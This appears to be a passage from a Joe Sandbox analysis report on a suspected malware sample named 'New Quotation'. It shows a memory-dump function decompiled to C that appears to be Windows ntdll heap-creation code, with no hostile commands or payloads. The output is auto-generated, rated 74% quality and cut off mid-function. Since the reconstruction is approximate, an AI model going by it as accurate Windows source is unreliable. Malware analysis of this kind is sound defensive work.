                                                                                                                                                                                          0x1d7ead51
                                                                                                                                                                                          0x1d7ead51
                                                                                                                                                                                          0x1d7ead4b
                                                                                                                                                                                          0x1d7ead5d
                                                                                                                                                                                          0x1d7ead60
                                                                                                                                                                                          0x1d7ead62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ead38

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                          • API String ID: 0-3197712848
                                                                                                                                                                                          • Opcode ID: 8a83e799c917dc654a82b2966bdd3ccf736338a09b715caca881dadd02269c36
                                                                                                                                                                                          • Instruction ID: b82c86f1ee6e325456e6873412fc5baf85e3104684d1b826a5b020c4f5d2298b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a83e799c917dc654a82b2966bdd3ccf736338a09b715caca881dadd02269c36
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE12C1716083519BD721DB24C880BBBB7E1BF84BA4F05496EF9898B291E734E944C793
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E0F90 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D7E0F90(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t415;
				signed int _t419;
				void* _t420;
				void* _t424;
				void* _t427;
				void _t435;
				signed int _t438;
				intOrPtr _t440;
				void* _t442;
				void* _t443;
				signed int _t444;
				void* _t447;
				unsigned int _t453;
				intOrPtr* _t473;
				intOrPtr* _t475;
				intOrPtr* _t477;
				intOrPtr* _t479;
				void* _t505;
				void* _t507;
				signed int _t513;
				void* _t519;
				void* _t522;
				intOrPtr _t523;
				void* _t524;
				void* _t527;
				char* _t534;
				intOrPtr _t545;
				intOrPtr _t554;
				void* _t557;
				void* _t558;
				signed int _t559;
				void* _t562;
				signed int _t564;
				void* _t565;
				signed int _t570;
				signed int _t571;
				intOrPtr _t592;
				void* _t601;
				signed int _t602;
				void* _t605;
				unsigned int _t613;
				void* _t616;
				void* _t620;
				signed int _t626;
				intOrPtr _t627;
				void* _t630;
				void* _t631;
				signed int _t641;
				intOrPtr _t643;
				signed int _t658;
				void* _t666;
				signed int _t671;
				signed int _t672;
				signed int _t682;
				void* _t686;
				signed int _t691;
				signed char _t692;
				signed int _t693;
				void* _t701;
				void* _t702;
				signed char _t703;
				void* _t718;
				void* _t719;
				void* _t721;
				short _t723;
				void* _t724;
				signed int _t726;
				signed int _t727;
				void* _t741;
				void* _t742;
				intOrPtr* _t745;
				void* _t746;
				signed int _t747;
				signed int _t748;
				void* _t750;
				intOrPtr* _t758;
				void* _t759;
				void* _t761;
				void* _t764;
				intOrPtr _t768;
				void* _t769;
				void* _t774;

				_push(0x11c);
				_push(0x1d8ac130);
				E1D827C40(__ebx, __edi, __esi);
				_t613 =  *(_t759 + 0x18);
				 *(_t759 - 0xb4) = _t613;
				_t691 =  *(_t759 + 8);
				 *(_t759 - 0xb0) = _t691;
				_t415 =  *(_t759 + 0xc);
				 *(_t759 - 0xb8) = _t415;
				 *(_t759 - 0xf4) = _t415;
				_t616 =  *(_t759 + 0x10);
				 *(_t759 - 0xc8) = _t616;
				_t741 =  *(_t759 + 0x14);
				 *(_t759 - 0xc0) = _t741;
				 *(_t759 - 0xe8) = _t613;
				_t718 =  *(_t759 + 0x1c);
				 *(_t759 - 0xd4) =  *( *[fs:0x30] + 0x68);
				 *(_t759 - 0xe4) = 0;
				 *(_t759 - 0xac) = 0;
				 *(_t759 - 0xd0) = 0;
				_t768 =  *0x1d8c373c; // 0x0
				if(_t768 != 0) {
					__eflags =  *(_t759 - 0xb8);
					if( *(_t759 - 0xb8) != 0) {
						goto L1;
					}
					__eflags =  *(_t759 - 0xb4);
					if( *(_t759 - 0xb4) != 0) {
						goto L1;
					}
					_t758 =  *0x1d8c3754; // 0x0
					 *0x1d8c91e0(_t691, 0, _t616, _t741, 0, _t718);
					 *_t758();
					_t742 = 0;
					__eflags = 0;
					if(0 != 0) {
						L82:
						_t719 =  *(_t759 - 0xb8);
						L83:
						_t693 =  *(_t759 - 0xb4);
						L84:
						_t419 =  *(_t759 - 0xd0);
						if(_t419 != 0) {
							__eflags = _t419 - _t693;
							if(_t419 != _t693) {
								E1D7CFBD0(0, _t719, _t742, _t419);
							}
						}
						if( *(_t759 - 0xac) != 0) {
							__eflags = _t719;
							if(_t719 == 0) {
								 *(_t759 - 0xbc) = 0;
								E1D7CFABA(_t759 - 0xac, _t759 - 0xbc, 0x8000);
							}
						}
						_t420 = _t742;
						L87:
						 *[fs:0x0] =  *((intOrPtr*)(_t759 - 0x10));
						return _t420;
					}
					__eflags = _t718 - 0xffffffff;
					if(_t718 != 0xffffffff) {
						L117:
						_t719 =  *(_t759 - 0xb8);
						L110:
						_t742 = 0;
						goto L83;
					}
					_t718 = 0;
					_t691 =  *(_t759 - 0xb0);
					_t616 =  *(_t759 - 0xc8);
					L2:
					_t692 = _t691 & 0xf1ffffff;
					 *(_t759 - 0xb0) = _t692;
					_t742 = 0;
					if((_t692 & 0x00000100) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L82;
						}
						__eflags = _t616;
						if(_t616 != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xc0);
						if( *(_t759 - 0xc0) != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb4);
						if( *(_t759 - 0xb4) != 0) {
							goto L82;
						}
						__eflags = _t718 - 0xffffffff;
						if(_t718 == 0xffffffff) {
							_t602 =  *0x1d8c3744; // 0x0
							asm("sbb eax, eax");
							_t718 = _t718 &  !( ~_t602);
							__eflags = _t718;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							_t742 = _t759 - 0x4c;
							goto L4;
						} else {
							_t742 = _t718;
							_t601 = E1D890A68(_t718);
							__eflags = _t601;
							if(_t601 == 0) {
								goto L117;
							}
							_t692 =  *(_t759 - 0xb0);
							L4:
							_t424 = 2;
							L5:
							if(_t742 != 0) {
								__eflags = _t742 - _t759 - 0x4c;
								if(_t742 == _t759 - 0x4c) {
									_t723 = 0x30;
									E1D818F40(_t742, 0, _t723);
									_t435 = 2;
									 *_t742 = _t435;
									 *((short*)(_t742 + 2)) = _t723;
									 *((intOrPtr*)(_t742 + 0xc)) = 1;
									_t314 = _t742 + 0x10;
									 *_t314 =  *(_t742 + 0x10) | 0xffffffff;
									__eflags =  *_t314;
								}
								__eflags =  *(_t742 + 4) & 0x00000001;
								if(( *(_t742 + 4) & 0x00000001) == 0) {
									_t620 = E1D890A21(_t742);
									_t721 =  *(_t759 - 0xc8);
									_t427 =  *(_t759 - 0xc0);
									__eflags = _t721;
									if(_t721 == 0) {
										_t721 = _t427;
									}
									__eflags = _t427 - _t721;
									if(_t427 > _t721) {
										_t427 = _t721;
									}
									_t742 = E1D898BBE(E1D87D85E(_t427,  *(_t759 - 0xb0),  *(_t759 - 0xd4)), _t721, _t427, _t620, _t692);
									__eflags = _t742;
									if(_t742 != 0) {
										E1D7C918A(_t742, 0, 1, 0);
										__eflags =  *(_t742 + 0x14);
										if( *(_t742 + 0x14) == 0) {
											E1D898E26(_t742);
											_t742 = 0;
										}
									}
									goto L82;
								} else {
									__eflags =  *0x1d8c3744; // 0x0
									if(__eflags == 0) {
										goto L117;
									}
									_t719 =  *(_t759 - 0xb8);
									_t745 =  *0x1d8c3754; // 0x0
									 *0x1d8c91e0( *(_t759 - 0xb0), _t719,  *(_t759 - 0xc8),  *(_t759 - 0xc0), 0, 0);
									_t742 =  *_t745();
									goto L83;
								}
							}
							if((_t692 & 0x10000000) != 0) {
								L9:
								_t746 = 0x30;
								E1D818F40(_t759 - 0xa8, 0, _t746);
								_t764 = _t761 + 0xc;
								if(_t718 != 0) {
									 *((intOrPtr*)(_t759 - 4)) = 0;
									__eflags =  *_t718 - _t746;
									if( *_t718 == _t746) {
										_t682 = 0xc;
										memcpy(_t759 - 0xa8, _t718, _t682 << 2);
										_t764 = _t764 + 0xc;
									}
									 *((intOrPtr*)(_t759 - 4)) = 0xfffffffe;
								}
								_t626 =  *(_t759 - 0xd4);
								_t438 =  *(_t759 - 0xb0);
								if((_t626 & 0x00000010) != 0) {
									_t438 = _t438 | 0x00000020;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000020) != 0) {
									_t438 = _t438 | 0x00000040;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00200000) != 0) {
									_t438 = _t438 | 0x00000080;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000040) != 0) {
									_t438 = _t438 | 0x40000000;
									 *(_t759 - 0xb0) = _t438;
								}
								if((0x00000080 & _t626) != 0) {
									_t438 = _t438 | 0x20000000;
									 *(_t759 - 0xb0) = _t438;
								}
								_t699 = 0x1000;
								if((0x00001000 & _t626) != 0) {
									 *(_t759 - 0xb0) = _t438 | 0x08000000;
								}
								_t627 =  *[fs:0x30];
								if( *((intOrPtr*)(_t759 - 0xa4)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa4)) =  *((intOrPtr*)(_t627 + 0x78));
								}
								if( *((intOrPtr*)(_t759 - 0xa0)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa0)) =  *((intOrPtr*)(_t627 + 0x7c));
								}
								if( *(_t759 - 0x9c) == 0) {
									 *(_t759 - 0x9c) =  *(_t627 + 0x84);
								}
								if( *(_t759 - 0x98) == 0) {
									 *(_t759 - 0x98) =  *(_t627 + 0x80);
								}
								_t440 =  *0x1d8c693c; // 0x7ffeffff
								if(_t440 == 0) {
									 *0x1d8c6940 = 0x10000;
									_push(0);
									_push(0x2c);
									_push(_t759 - 0x78);
									_push(0);
									_t442 = E1D812D10();
									__eflags = _t442;
									if(_t442 < 0) {
										goto L117;
									}
									_t440 =  *((intOrPtr*)(_t759 - 0x58));
									 *0x1d8c693c = _t440;
									_t699 = 0x1000;
								}
								if( *((intOrPtr*)(_t759 - 0x94)) == 0) {
									 *((intOrPtr*)(_t759 - 0x94)) = _t440 -  *0x1d8c6940 - _t699;
								}
								if( *((intOrPtr*)(_t759 - 0x90)) != 0) {
									__eflags =  *((intOrPtr*)(_t759 - 0x90)) - 0x7f000;
									if( *((intOrPtr*)(_t759 - 0x90)) <= 0x7f000) {
										L29:
										_t443 =  *(_t759 - 0xc0);
										if(_t443 != 0) {
											_t699 = _t443 + 0x00000fff & 0xfffff000;
										}
										 *(_t759 - 0xc4) = _t699;
										_t724 =  *(_t759 - 0xc8);
										if(_t724 != 0) {
											_t629 = _t724 + 0x00000fff & 0xfffff000;
										} else {
											_t62 = _t699 + 0xffff; // 0x10fff
											_t629 = _t62 & 0xffff0000;
										}
										 *(_t759 - 0xbc) = _t629;
										_t747 = _t699;
										if(_t699 > _t629) {
											_t699 = _t629;
											 *(_t759 - 0xc4) = _t629;
											_t747 = _t629;
										}
										_t444 =  *(_t759 - 0xb0);
										_t719 =  *(_t759 - 0xb8);
										if((_t444 & 0x00000002) == 0 || _t719 != 0) {
											 *(_t759 - 0xd4) = 0;
										} else {
											 *(_t759 - 0xd4) = 0x1000;
											 *(_t759 - 0xe4) = 2;
											_t70 = _t629 - 0x1000; // 0xffff
											_t444 =  *(_t759 - 0xb0);
											if(_t70 < _t747) {
												_t629 = _t629 + 0x00010fff & 0xffff0000;
												 *(_t759 - 0xbc) = _t629;
											}
										}
										if(_t747 == 0 || _t629 == 0) {
											goto L110;
										} else {
											if((_t444 & 0x61000000) != 0) {
												__eflags = _t444 & 0x10000000;
												if((_t444 & 0x10000000) != 0) {
													goto L39;
												}
												_t420 = E1D87F51B(_t444, _t719, _t629, _t699,  *(_t759 - 0xb4), _t759 - 0xa8);
												goto L87;
											}
											L39:
											 *(_t759 - 0xc8) = 0x258;
											_t693 =  *(_t759 - 0xb4);
											if((_t444 & 0x00000001) != 0) {
												__eflags = _t693;
												if(_t693 == 0) {
													L42:
													if(_t719 != 0) {
														__eflags =  *(_t759 - 0x84);
														if( *(_t759 - 0x84) != 0) {
															_t701 =  *(_t759 - 0x8c);
															__eflags = _t701;
															if(_t701 == 0) {
																goto L110;
															}
															_t630 =  *(_t759 - 0x88);
															__eflags = _t630;
															if(_t630 == 0) {
																goto L110;
															}
															__eflags = _t701 - _t630;
															if(_t701 > _t630) {
																goto L110;
															}
															__eflags = _t444 & 0x00000002;
															if((_t444 & 0x00000002) != 0) {
																goto L110;
															}
															 *(_t759 - 0xcc) = _t719;
															 *(_t759 - 0xc0) = _t719 + _t701;
															 *(_t759 - 0xbc) = _t630;
															E1D818F40(_t719, 0, 0x1000);
															_t764 = _t764 + 0xc;
															L108:
															_t748 =  *(_t759 - 0xb0);
															L100:
															 *(_t759 - 0xe4) =  *(_t759 - 0xe4) | 0x00000001;
															_t702 = _t719;
															 *(_t759 - 0xac) = _t702;
															_t726 = _t748 & 0x00040000;
															_t631 =  *(_t759 - 0xc0);
															_t447 =  *(_t759 - 0xcc);
															L49:
															if(_t447 != _t631) {
																L55:
																_t727 = _t702 + 0x258;
																if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
																	 *( *(_t759 - 0xac) + 0xbc) = _t727 + 0x00000007 & 0xfffffff8;
																	 *(_t759 - 0xc8) =  *(_t759 - 0xc8) + 0x60c;
																	_t727 =  *( *(_t759 - 0xac) + 0xbc) + 0x60c;
																	 *(_t759 - 0xb0) =  *(_t759 - 0xb0) | 0x04000000;
																	_t748 =  *(_t759 - 0xb0);
																}
																_t453 =  *(_t759 - 0xc8) + 0x00000007 & 0xfffffff8;
																 *(_t759 - 0xe8) = _t453;
																 *( *(_t759 - 0xac)) = _t453 >> 3;
																 *((char*)( *(_t759 - 0xac) + 2)) = 1;
																 *((char*)( *(_t759 - 0xac) + 7)) = 1;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x60)) = 0xeeffeeff;
																 *( *(_t759 - 0xac) + 0x40) = _t748 & 0xefffffff;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x58)) = 0;
																E1D818F40( *(_t759 - 0xac) + 0x1f4, 0, 0x5c);
																E1D7D22E1( *(_t759 - 0xac));
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x234)) = 1;
																_t750 =  *(_t759 - 0xac);
																if(( *(_t750 + 0x40) & 0x08000000) != 0) {
																	 *(_t750 + 0x58) = E1D88D8FD(0x1d88fd00) & 0x0000ffff;
																	 *( *(_t759 - 0xac) + 0x40) =  *( *(_t759 - 0xac) + 0x40) & 0xffffffbf;
																	_t750 =  *(_t759 - 0xac);
																}
																_t703 =  *(_t759 - 0xb0);
																 *(_t750 + 0x44) = _t703 & 0x6001007d;
																 *((short*)( *(_t759 - 0xac) + 0x7e)) = _t727 -  *(_t759 - 0xac);
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x80)) = 0;
																_t473 =  *(_t759 - 0xac) + 0xc0;
																 *((intOrPtr*)(_t473 + 4)) = _t473;
																 *_t473 = _t473;
																_t475 =  *(_t759 - 0xac) + 0x9c;
																 *((intOrPtr*)(_t475 + 4)) = _t475;
																 *_t475 = _t475;
																_t477 =  *(_t759 - 0xac) + 0xa4;
																 *((intOrPtr*)(_t477 + 4)) = _t477;
																 *_t477 = _t477;
																_t479 =  *(_t759 - 0xac) + 0x8c;
																 *((intOrPtr*)(_t479 + 4)) = _t479;
																 *_t479 = _t479;
																_t641 =  *(_t759 - 0xd0);
																if(_t641 != 0 || (_t703 & 0x00000001) != 0) {
																	L61:
																	 *( *(_t759 - 0xac) + 0xc8) = _t641;
																	 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) | 0x80000000;
																	if(E1D801EED( *(_t759 - 0xac),  *(_t759 - 0xac),  *(_t759 - 0xe8) + 0x238, _t641,  *(_t759 - 0xe4),  *(_t759 - 0xcc),  *(_t759 - 0xc0),  *(_t759 - 0xcc) -  *(_t759 - 0xd4) +  *(_t759 - 0xbc)) == 0) {
																		goto L117;
																	}
																	if( *(_t759 - 0xb8) != 0) {
																		E1D818F40(_t727, 0, 0x80);
																	}
																	 *((intOrPtr*)(_t727 + 4)) = 0x80;
																	_t643 = _t727 + 0x24;
																	 *((intOrPtr*)(_t727 + 0x1c)) = _t643;
																	 *(_t727 + 0x18) =  *(_t759 - 0xac) + 0xc0;
																	 *((intOrPtr*)(_t727 + 0x20)) = _t643 + 0x10;
																	E1D7D1A24( *(_t759 - 0xac), _t727);
																	 *((short*)( *(_t759 - 0xac) + 0x7c)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x64)) =  *((intOrPtr*)(_t759 - 0xa4));
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x68)) =  *((intOrPtr*)(_t759 - 0xa0));
																	 *( *(_t759 - 0xac) + 0x6c) =  *(_t759 - 0x9c) >> 3;
																	 *( *(_t759 - 0xac) + 0x70) =  *(_t759 - 0x98) >> 3;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x78)) =  *((intOrPtr*)(_t759 - 0x94));
																	 *( *(_t759 - 0xac) + 0x5c) =  *((intOrPtr*)(_t759 - 0x90)) + 7 >> 3;
																	 *( *(_t759 - 0xac) + 0xcc) =  *(_t759 - 0x84) ^  *0x1d8c6d48;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x250)) = 4;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x254)) = 0xfe000;
																	if(( *0x1d8c6934 & 1) != 0) {
																		 *( *(_t759 - 0xac) + 0x48) = 1;
																	}
																	_t658 =  *(_t759 - 0xb0);
																	_t505 =  *(_t759 - 0xac);
																	if((_t658 & 0x00010000) != 0) {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0x17;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff0;
																	} else {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0xf;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff8;
																	}
																	_t507 =  *(_t759 - 0xac);
																	if(( *(_t507 + 0x40) & 0x00000020) != 0) {
																		 *((intOrPtr*)(_t507 + 0x94)) =  *((intOrPtr*)(_t507 + 0x94)) + 8;
																		_t507 =  *(_t759 - 0xac);
																	}
																	 *((intOrPtr*)(_t507 + 0xe4)) = 0;
																	 *((short*)( *(_t759 - 0xac) + 0xe8)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xea)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xeb)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0xb8)) = 0;
																	_t513 = _t658 & 0x00000003;
																	_t659 = _t658 & 0xffffff00 | _t513 == 0x00000002;
																	if(((_t513 & 0xffffff00 | ( *0x1d8c6934 & 1) == 0x00000000) & (_t658 & 0xffffff00 | _t513 == 0x00000002)) == 0) {
																		L70:
																		E1D7DFED0(0x1d8c4800);
																		E1D80666D( *(_t759 - 0xac));
																		_push(0x1d8c4800);
																		E1D7DE740( *(_t759 - 0xac));
																		if( *((intOrPtr*)( *(_t759 - 0xac) + 0x7c)) == 0) {
																			goto L117;
																		}
																		_t519 = E1D7E3C40();
																		_t753 = 0x7ffe0380;
																		if(_t519 != 0) {
																			_t522 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		} else {
																			_t522 = 0x7ffe0380;
																		}
																		if( *_t522 != 0) {
																			_t523 =  *[fs:0x30];
																			__eflags =  *(_t523 + 0x240) & 0x00000001;
																			if(( *(_t523 + 0x240) & 0x00000001) == 0) {
																				goto L74;
																			}
																			__eflags = E1D7E3C40();
																			if(__eflags != 0) {
																				_t753 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																				__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																			}
																			_t754 =  *(_t759 - 0xb0);
																			E1D88F0E5(0,  *(_t759 - 0xac),  *(_t759 - 0xb0), 0x1d8c4800, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t753 & 0x000000ff);
																			goto L75;
																		} else {
																			L74:
																			_t754 =  *(_t759 - 0xb0);
																			L75:
																			_t524 = E1D7E3C40();
																			_t731 = 0x7ffe038a;
																			if(_t524 != 0) {
																				_t527 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																			} else {
																				_t527 = 0x7ffe038a;
																			}
																			if( *_t527 != 0) {
																				__eflags = E1D7E3C40();
																				if(__eflags != 0) {
																					_t731 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																					__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																				}
																				E1D88F0E5(0,  *(_t759 - 0xac), _t754, _t731, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t731 & 0x000000ff);
																			}
																			if(E1D7E3C40() != 0) {
																				_t534 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
																			} else {
																				_t534 = 0x7ffe0388;
																			}
																			if( *_t534 != 0) {
																				E1D88D947(0,  *(_t759 - 0xac),  *(_t759 - 0xbc), _t754);
																			}
																			 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) & 0x7fffffff;
																			 *((intOrPtr*)( *(_t759 - 0xac) + 0xd0)) = 0;
																			_t742 =  *(_t759 - 0xac);
																			 *(_t759 - 0xac) = 0;
																			 *(_t759 - 0xd0) = 0;
																			goto L82;
																		}
																	} else {
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0xec)) = E1D7E5D90(_t659,  *(_t759 - 0xac), 0x80000a, 0x100);
																		_t545 =  *((intOrPtr*)( *(_t759 - 0xac) + 0xec));
																		if(_t545 == 0) {
																			goto L117;
																		}
																		 *((char*)(_t545 - 1)) = 1;
																		 *((short*)( *(_t759 - 0xac) + 0xf0)) = 0x80;
																		goto L70;
																	}
																} else {
																	 *(_t759 - 0xd0) = _t727;
																	if(E1D7FFBC0(_t727, 0, 0x10000000) < 0) {
																		 *(_t759 - 0xd0) = 0;
																		goto L117;
																	}
																	_t727 = _t727 + 0x18;
																	_t641 =  *(_t759 - 0xd0);
																	goto L61;
																}
															}
															asm("sbb edi, edi");
															_push(( ~_t726 & 0x0000003c) + 4);
															_push(0x1000);
															_push(_t759 - 0xc4);
															_push(0);
															_push(_t759 - 0xcc);
															_push(0xffffffff);
															if(E1D812B10() < 0) {
																goto L117;
															}
															if(E1D7E3C40() != 0) {
																_t666 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
															} else {
																_t666 = 0x7ffe0380;
															}
															if( *_t666 != 0) {
																_t554 =  *[fs:0x30];
																__eflags =  *(_t554 + 0x240) & 0x00000001;
																if(( *(_t554 + 0x240) & 0x00000001) != 0) {
																	E1D88EFD3(0,  *(_t759 - 0xac),  *(_t759 - 0xcc),  *(_t759 - 0xc4), 1);
																}
															}
															 *(_t759 - 0xc0) =  *(_t759 - 0xc0) +  *(_t759 - 0xc4);
															_t702 =  *(_t759 - 0xac);
															goto L55;
														}
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x110);
														_push(0);
														_push(_t719);
														_push(0xffffffff);
														_t557 = E1D812BE0();
														__eflags = _t557;
														if(_t557 < 0) {
															goto L110;
														}
														_t558 =  *(_t759 - 0x110);
														 *(_t759 - 0xc0) = _t558;
														__eflags = _t558 - _t719;
														if(_t558 != _t719) {
															goto L110;
														}
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x10000;
														if( *((intOrPtr*)(_t759 - 0x100)) == 0x10000) {
															goto L110;
														}
														 *(_t759 - 0xcc) = _t558;
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x1000;
														if( *((intOrPtr*)(_t759 - 0x100)) != 0x1000) {
															_t671 =  *(_t759 - 0x104);
															 *(_t759 - 0xbc) = _t671;
															_t559 =  *(_t759 - 0xc4);
															__eflags = _t559 - _t671;
															if(_t559 > _t671) {
																_t559 = _t671;
																 *(_t759 - 0xc4) = _t559;
															}
															__eflags = _t559 - 0x1000;
															if(_t559 < 0x1000) {
																goto L110;
															} else {
																goto L108;
															}
														}
														_t748 =  *(_t759 - 0xb0);
														__eflags = _t748 & 0x00040000;
														if((_t748 & 0x00040000) != 0) {
															__eflags =  *(_t759 - 0xfc) & 0x00000040;
															if(( *(_t759 - 0xfc) & 0x00000040) == 0) {
																goto L110;
															}
														}
														E1D818F40(_t558, 0, 0x1000);
														_t764 = _t764 + 0xc;
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x12c);
														_push(3);
														_push(_t719);
														_push(0xffffffff);
														_t562 = E1D812BE0();
														__eflags = _t562;
														if(_t562 < 0) {
															goto L110;
														}
														 *(_t759 - 0xbc) =  *(_t759 - 0x120);
														_t564 =  *(_t759 - 0x104);
														 *(_t759 - 0xc4) = _t564;
														_t565 =  *(_t759 - 0xcc) + _t564;
														__eflags = _t565;
														 *(_t759 - 0xc0) = _t565;
														goto L100;
													}
													 *(_t759 - 0xdc) = 0;
													if( *(_t759 - 0x84) != _t719) {
														L172:
														_t742 = 0;
														goto L84;
													}
													 *(_t759 - 0xe8) = E1D7D2330(_t629);
													_t570 = (E1D7D2330(_t629) & 0x0000001f) << 0x10;
													 *(_t759 - 0xd8) = _t570;
													_t672 =  *(_t759 - 0xbc);
													_t571 = _t570 + _t672;
													 *(_t759 - 0xe0) = _t571;
													if(_t571 < _t672) {
														 *(_t759 - 0xe0) = _t672;
														 *(_t759 - 0xd8) = 0;
													}
													_t748 =  *(_t759 - 0xb0);
													_t726 = _t748 & 0x00040000;
													asm("sbb eax, eax");
													_push(( ~_t726 & 0x0000003c) + 4);
													_push(0x2000);
													_push(_t759 - 0xe0);
													_push(0);
													_push(_t759 - 0xdc);
													_push(0xffffffff);
													if(E1D812B10() < 0) {
														goto L117;
													} else {
														_t702 =  *(_t759 - 0xdc);
														 *(_t759 - 0xac) = _t702;
														 *(_t759 - 0xbc) =  *(_t759 - 0xe0);
														if( *(_t759 - 0xd8) != 0) {
															E1D7CFABA(_t759 - 0xdc, _t759 - 0xd8, 0x8000);
															_t702 =  *(_t759 - 0xdc) +  *(_t759 - 0xd8);
															 *(_t759 - 0xac) = _t702;
															 *(_t759 - 0xbc) =  *(_t759 - 0xe0) -  *(_t759 - 0xd8);
														}
														_t447 = _t702;
														 *(_t759 - 0xcc) = _t447;
														_t631 = _t702;
														 *(_t759 - 0xc0) = _t631;
														goto L49;
													}
												}
												goto L172;
											}
											if(_t693 != 0) {
												_t444 = _t444 | 0x80000000;
												 *(_t759 - 0xb0) = _t444;
											}
											asm("sbb ecx, ecx");
											 *(_t759 - 0xd0) =  ~_t693 & _t693;
											asm("sbb ecx, ecx");
											_t629 = ( ~_t693 & 0xffffffe8) + 0x270;
											 *(_t759 - 0xc8) = ( ~_t693 & 0xffffffe8) + 0x270;
											goto L42;
										}
									}
								}
								 *((intOrPtr*)(_t759 - 0x90)) = 0x7f000;
								goto L29;
							}
							_t774 =  *0x1d8c6960 - _t424; // 0x0
							if(_t774 >= 0) {
								__eflags = _t692 & 0xfff80c00;
								if((_t692 & 0xfff80c00) == 0) {
									goto L9;
								}
								_t592 =  *[fs:0x30];
								__eflags =  *(_t592 + 0xc);
								if( *(_t592 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("!(CheckedFlags & ~HEAP_CREATE_VALID_MASK)");
								E1D7CB910();
								__eflags =  *0x1d8c5da8; // 0x0
								if(__eflags == 0) {
									_t686 = 2;
									E1D88FC95(0, _t686, _t718, __eflags);
								}
								_t692 =  *(_t759 - 0xb0);
							}
							if((_t692 & 0xfff80c00) != 0) {
								 *(_t759 - 0xb0) = _t692 & 0x0007f3ff;
							}
							goto L9;
						}
					}
					if(( *0x1d8c6938 & 0x00000001) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L4;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L4;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							L135:
							_t424 = 2;
							__eflags =  *(_t759 - 0xb4);
							if( *(_t759 - 0xb4) == 0) {
								_t742 = _t759 - 0x4c;
							}
							goto L5;
						}
						_t605 = E1D890A4D(_t718);
						__eflags = _t605;
						if(_t605 == 0) {
							goto L4;
						}
						goto L135;
					}
					goto L4;
				}
				L1:
				_t769 =  *0x1d8c3744; // 0x0
